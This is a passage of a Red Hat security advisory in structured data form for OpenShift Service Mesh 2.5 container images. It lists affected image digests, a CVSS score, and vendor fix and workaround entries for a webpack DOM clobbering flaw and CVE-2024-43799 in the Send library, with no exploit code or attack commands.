"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.1, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", version: "3.1", }, products: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", }, { cve: "CVE-2024-43799", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:30.869487+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311153", }, ], notes: [ { category: "description", text: "A flaw was found in the Send library. This vulnerability allows remote code execution via untrusted input passed to the SendStream.redirect() function.", title: "Vulnerability description", }, { category: "summary", text: "send: Code Execution Vulnerability in Send Library", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43799", }, { category: "external", summary: "RHBZ#2311153", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311153", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43799", url: "https://www.cve.org/CVERecord?id=CVE-2024-43799", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", }, { category: "external", summary: "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", url: "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", }, { category: "external", summary: "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", url: "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", }, ], release_date: "2024-09-10T15:15:17.727000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:53+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7725", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", 